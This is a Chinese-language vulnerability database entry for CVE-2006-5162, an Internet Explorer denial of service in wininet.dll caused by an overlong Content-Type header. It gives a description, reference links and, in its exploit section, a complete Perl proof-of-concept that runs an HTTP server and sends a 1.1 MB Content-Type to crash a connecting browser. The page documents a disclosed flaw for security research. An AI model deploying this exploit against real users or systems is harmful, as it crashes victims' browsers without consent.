Microsoft IE超长Content-Type字段处理'wininet.dll'拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110647 漏洞类型 缓冲区溢出
发布时间 2006-07-20 更新时间 2006-10-06
CVE编号 CVE-2006-5162 CNNVD-ID CNNVD-200610-066
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2039
https://cxsecurity.com/issue/WLB-2006100049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-066
|漏洞详情
MicrosoftInternetExplorer是微软发布的非常流行的WEB浏览器。MicrosoftInternetExplorer在处理服务器回应中超长的Content-Type字段时存在漏洞,远程恶意Web服务器可能利用此漏洞导致客户端IE崩溃。如果用户受骗访问了恶意Web服务器上设置有特制Content-Type属性的WEB页面的话,就可能触发wininet.dll中的栈溢出,导致IE拒绝服务。
|漏洞EXP
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage: 
#	  1) run this code
#       2) open http://127.0.0.1/ with IE
#	     

use IO::Socket;
my $sock=new IO::Socket::INET (Listen    => 1,
                                 LocalAddr => 'localhost',
                                 LocalPort => 80,
                                 Proto     => 'tcp');
die unless $sock;
$huge="A" x 1100000;
$|=1;
print ">http server started on port 80... try 'iexplore http://127.0.0.1/' \n";
$z=$sock->accept();
print ">connection!\n";
do
{
	$ln=<$z>;
	print $ln;
	chomp $ln;
	
	if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
	{
		print ">sending response\n";
		print $z "HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
		close($z);
		exit;
	}
} while (true);

# milw0rm.com [2006-07-20]
|参考资料

来源:XF
名称:ie-wininet-dos(27900)
链接:http://xforce.iss.net/xforce/xfdb/27900
来源:BID
名称:19092
链接:http://www.securityfocus.com/bid/19092
来源:OSVDB
名称:29129
链接:http://www.osvdb.org/29129
来源:MILW0RM
名称:2039
链接:http://www.milw0rm.com/exploits/2039
来源:VUPEN
名称:ADV-2006-2917
链接:http://www.frsirt.com/english/advisories/2006/2917
来源:BUGTRAQ
名称:20060722MicrosoftInternetExplorerDOSVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2006-07/0379.html
来源:SREASON
名称:1683
链接:http://securityreason.com/securityalert/1683
来源:MILW0RM
名称:2039
链接:http://milw0rm.com/exploits/2039